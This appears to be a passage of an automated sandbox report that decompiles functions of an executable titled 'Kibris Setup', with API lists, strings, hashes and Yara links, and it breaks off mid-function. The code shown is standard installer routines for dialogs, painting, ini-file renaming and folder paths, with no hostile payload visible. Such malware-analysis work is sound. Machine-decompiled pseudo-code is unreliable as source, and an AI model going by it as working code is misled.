API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 05a311050dda4b414fd1261923b8e6b7691581466e425b0fd9ae4ea99a1d7fb6
Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
Opcode Fuzzy Hash: 05a311050dda4b414fd1261923b8e6b7691581466e425b0fd9ae4ea99a1d7fb6
Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004042E6, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004042E6(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42985c =  *0x42985c + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E004041E2(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42e3c0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_push(1);
								E0040458A(_a4, _v8);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f428, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f428, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42985c != 0) {
						goto L25;
					} else {
						_t112 =  *0x42a068 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E0040419D(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404566();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42ebfc; // 0x82bae7
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x42f478;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E004042B1;
				E0040417B(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E0040417B(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E0040419D( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E004041B0(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x42f434 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				 *0x42985c = 0;
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x42985c = 0;
				return 0;
			}

0x004042f6
0x0040441b
0x00404477
0x0040447b
0x00404548
0x0040454a
0x0040454a
0x00404550
0x00404550
0x00404553
0x00000000
0x0040455a
0x00404489
0x0040448b
0x00404495
0x004044a0
0x004044a3
0x004044a6
0x004044b1
0x004044b4
0x004044bb
0x004044c9
0x004044e1
0x004044e3
0x004044eb
0x004044fa
0x004044fc
0x004044fc
0x004044bb
0x00404506
0x00000000
0x00404511
0x00404515
0x00404526
0x00404526
0x0040452c
0x0040453a
0x0040453a
0x00000000
0x0040453e
0x00404506
0x00404426
0x00000000
0x0040443a
0x00404440
0x00404446
0x00000000
0x00000000
0x0040446b
0x0040446d
0x00404472
0x00000000
0x00404472
0x00404426
0x004042fc
0x004042ff
0x00404304
0x00404306
0x00404315
0x00404315
0x0040431c
0x0040431f
0x00404321
0x00404326
0x0040432f
0x00404335
0x00404341
0x00404344
0x0040434d
0x00404352
0x00404355
0x0040435a
0x00404371
0x00404378
0x0040438b
0x0040438e
0x004043a3
0x004043aa
0x004043af
0x004043b4
0x004043b4
0x004043c3
0x004043d2
0x004043e4
0x004043e9
0x004043f9
0x004043fb
0x00000000

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404371
GetDlgItem.USER32 ref: 00404385
SendMessageA.USER32 ref: 004043A3
GetSysColor.USER32(?), ref: 004043B4
SendMessageA.USER32 ref: 004043C3
SendMessageA.USER32 ref: 004043D2
lstrlenA.KERNEL32(?), ref: 004043D5
SendMessageA.USER32 ref: 004043E4
SendMessageA.USER32 ref: 004043F9
GetDlgItem.USER32 ref: 0040445B
SendMessageA.USER32 ref: 0040445E
GetDlgItem.USER32 ref: 00404489
SendMessageA.USER32 ref: 004044C9
LoadCursorA.USER32 ref: 004044D8
SetCursor.USER32(00000000), ref: 004044E1
LoadCursorA.USER32 ref: 004044F7
SetCursor.USER32(00000000), ref: 004044FA
SendMessageA.USER32 ref: 00404526
SendMessageA.USER32 ref: 0040453A

Strings

N, xrefs: 00404477
KXCJDFJSKF, xrefs: 004044B4

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: KXCJDFJSKF$N
API String ID: 3103080414-3315232752
Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f434;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Kibris Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f428;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,Kibris Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C
Kibris Setup, xrefs: 00401150

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$Kibris Setup
API String ID: 941294808-1298045575
Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405D66, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D66(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x42c620 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca20, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x42c220, "%s=%s\r\n", 0x42c620, 0x42ca20);
						_t53 = _t52 + 0x10;
						E0040618A(_t37, 0x400, 0x42ca20, 0x42ca20,  *((intOrPtr*)( *0x42f434 + 0x128)));
						_t12 = E00405C90(0x42ca20, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405D08(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405BF5(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405BF5(_t38, _t21 + 0xa, 0x40a3d8);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405C4B(_t24 + _t46, 0x42c220, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405D37(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405C90(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x42c620, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00405d66
0x00405d6f
0x00405d76
0x00405d8a
0x00405db2
0x00405dbd
0x00405dc1
0x00405de1
0x00405de8
0x00405df2
0x00405dff
0x00405e04
0x00405e09
0x00405e0d
0x00405e1c
0x00405e1e
0x00405e2b
0x00405e2f
0x00405eca
0x00000000
0x00405e45
0x00405e52
0x00405e76
0x00405e7a
0x00405e99
0x00405e9d
0x00405e9d
0x00405e9f
0x00405ea8
0x00405eb3
0x00405ebe
0x00405ec4
0x00000000
0x00405ec4
0x00405e7c
0x00405e7f
0x00405e8a
0x00405e86
0x00405e88
0x00405e89
0x00405e89
0x00405e91
0x00405e93
0x00000000
0x00405e93
0x00405e5d
0x00405e63
0x00000000
0x00405e63
0x00405e2f
0x00405e0d
0x00405d8c
0x00405d97
0x00405da0
0x00405da4
0x00000000
0x00000000
0x00405da4
0x00405ed5

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
GetShortPathNameA.KERNEL32 ref: 00405DA0

Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37

GetShortPathNameA.KERNEL32 ref: 00405DBD
wsprintfA.USER32 ref: 00405DDB
GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
GlobalFree.KERNEL32 ref: 00405EC4
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB

Part of subcall function 00405C90: GetFileAttributesA.KERNEL32(00000003,00402EE1,C:\Users\user\Desktop\SYT09009.exe,80000000,00000003), ref: 00405C94
Part of subcall function 00405C90: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6

Strings

%s=%s, xrefs: 00405DD1
[Rename], xrefs: 00405E45, 00405E57

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: c8a07bbf3a544e04db1531592beb9b39ed12da8dfdba65436ce2583c9172ea3a
Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
Opcode Fuzzy Hash: c8a07bbf3a544e04db1531592beb9b39ed12da8dfdba65436ce2583c9172ea3a
Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD

Uniqueness

Uniqueness Score: -1.00%

Function 0040618A, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040618A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x42ebfc; // 0x82bae7
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x42f478;
				_t39 = 0x42e3c0;
				_t90 = 0x42e3c0;
				if(_a4 >= 0x42e3c0 && _a4 - 0x42e3c0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E0040618A(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x42e3c0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x430000;
							E004060F7(_t90, (_t97 << 0xa) + 0x430000);
						} else {
							E00406055(_t90,  *0x42f428);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E004063D2(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42f42c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42f4c4;
						if( *0x42f4c4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x42f424;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x42f428,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x42f428,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00405FDE((_t80 & 0x0000003f) +  *0x42f478, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f478, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E0040618A(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E004060F7(_a4, _t39);
			}

0x0040618a
0x0040618a
0x0040618a
0x00406190
0x00406195
0x00406197
0x004061a6
0x004061a6
0x004061ae
0x004061af
0x004061b0
0x004061b1
0x004061b4
0x004061bc
0x004061be
0x004061d5
0x004061d8
0x004061d8
0x004063af
0x004063af
0x004063b3
0x00000000
0x00000000
0x004061e5
0x004061eb
0x00000000
0x00000000
0x004061f1
0x004061f2
0x004061f5
0x004061f8
0x004063a2
0x004063ac
0x004063ae
0x004063ae
0x004063a4
0x004063a6
0x004063a8
0x004063a9
0x004063a9
0x00000000
0x004063a2
0x004061fe
0x00406202
0x00406212
0x00406219
0x0040621c
0x00406224
0x00406227
0x0040622e
0x0040622f
0x00406232
0x0040634f
0x00406352
0x00406382
0x00406385
0x0040638a
0x0040638e
0x0040638e
0x00406393
0x00406399
0x0040639b
0x00000000
0x0040639b
0x00406354
0x00406357
0x0040636c
0x00406373
0x00406359
0x00406360
0x00406360
0x0040637b
0x0040637e
0x00406347
0x00406348
0x00406348
0x00000000
0x0040637e
0x00406238
0x0040623f
0x00406241
0x00406242
0x0040625c
0x0040625c
0x00406263
0x00406263
0x0040626a
0x0040626e
0x0040626e
0x0040626f
0x00406271
0x004062aa
0x004062ad
0x004062bd
0x004062c0
0x004062c8
0x004062ce
0x004062ce
0x0040632d
0x0040632d
0x0040632f
0x00000000
0x00000000
0x004062d2
0x004062d9
0x004062da
0x004062dc
0x004062f6
0x00406304
0x0040630a
0x0040630c
0x0040632a
0x0040632a
0x0040632a
0x00000000
0x0040632a
0x00406312
0x0040631b
0x0040631e
0x00406324
0x00406328
0x00000000
0x00000000
0x00000000
0x00406328
0x004062de
0x004062e1
0x00000000
0x00000000
0x004062f0
0x004062f2
0x004062f4
0x00000000
0x00000000
0x00000000
0x004062f4
0x00000000
0x0040632d
0x004062b5
0x00000000
0x00406273
0x0040628e
0x00406293
0x00406296
0x00406336
0x00406336
0x0040633a
0x00406342
0x00406342
0x00000000
0x0040633a
0x004062a0
0x00406331
0x00406331
0x00406334
0x00000000
0x00000000
0x00000000
0x00406334
0x00406271
0x00406244
0x00406248
0x00000000
0x00000000
0x0040624a
0x0040624e
0x00000000
0x00000000
0x00406250
0x00406254
0x00000000
0x00406256
0x00406256
0x00000000
0x00406256
0x00406254
0x004063b9
0x004063c3
0x004063cf
0x004063cf
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 004062B5
GetWindowsDirectoryA.KERNEL32(KXCJDFJSKF,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
SHGetSpecialFolderLocation.SHELL32(00405256,7519EA30,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
SHGetPathFromIDListA.SHELL32(7519EA30,KXCJDFJSKF), ref: 00406312
CoTaskMemFree.OLE32(7519EA30), ref: 0040631E
lstrcatA.KERNEL32(KXCJDFJSKF,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
lstrlenA.KERNEL32(KXCJDFJSKF,?,0042A070,00000000,00405256,0042A070,00000000,00000000,00422648,7519EA30), ref: 00406394

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406284
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040633C
KXCJDFJSKF, xrefs: 004061B4, 00406281, 00406282, 00406283, 0040629F, 004062B4, 004062C7, 004062E3, 0040630E, 00406341, 00406347, 0040635F, 00406372, 0040638D, 00406393, 0040639B, 004063C5

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: KXCJDFJSKF$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-2443651505
Opcode ID: b81506d31a7a79703f981676f635a9404e1a7eaaabc2c3c435cbfeb6c21f0a75
Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
Opcode Fuzzy Hash: b81506d31a7a79703f981676f635a9404e1a7eaaabc2c3c435cbfeb6c21f0a75
Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E

Uniqueness

Uniqueness Score: -1.00%

Function 004063D2, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004063D2(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
